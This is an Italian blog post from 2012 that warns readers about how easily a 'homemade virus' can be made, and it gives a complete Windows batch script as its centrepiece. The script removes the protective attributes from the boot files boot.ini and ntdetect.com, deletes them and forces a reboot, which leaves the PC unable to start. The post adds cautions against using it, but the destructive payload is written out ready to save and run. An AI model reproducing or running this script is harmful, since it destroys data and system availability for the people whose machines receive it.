Domenica 20 Maggio 2012.

virus casalingo


Talvolta si pensa che costruire un virus sia opera di geni del'informatica, e che i virus siano programmi avanzatissimi ed estremamente sofisticati. Non è così: spesso un filee apparentemente semplice ed inoffensivo può risultare letale per il sistema.

A t t e n z i o n e ! ! !

Quello che state per leggere è la procedura per rendere inutilizzabile un PC Windows. Non esegite quanto segue sul PC di un utente inconsapevole, o peggio ancora non lo diffondete senza dire esattamente quali sono gli effetti. Sarebbe scorretto, dannoso e oltretutto costituirebbe un reato vero e proprio.

Sembra facile...

Scopriamo quanto è facile per un malintenzionato mettere fuori uso un computer scrivendo poche righe in file di testo... basta aprire Notepad e digitare quanto segue:

cd c:\
attrib boot.ini -s -h -r
attrib ntdetect.com -s -h -r
del boot.ini
del ntdetect.com
shutdown -r

salvare il file con l'estensione ".bat".

... e lo è!

Cliccando due volte su questo file il computer eliminerà due file di sistema di Windows necessari all'avvio del sistema operativo, poi riavvierà forzatamente il sistema. Purtroppo il computer non si riavvierà più..! Avete visto quanto è stato facile? Quindi, fate molta attenzione a ciò che vi scambiate via email o via messenger: chiunque senza alcuna conoscenza informatica può farvi un danno notevole.

login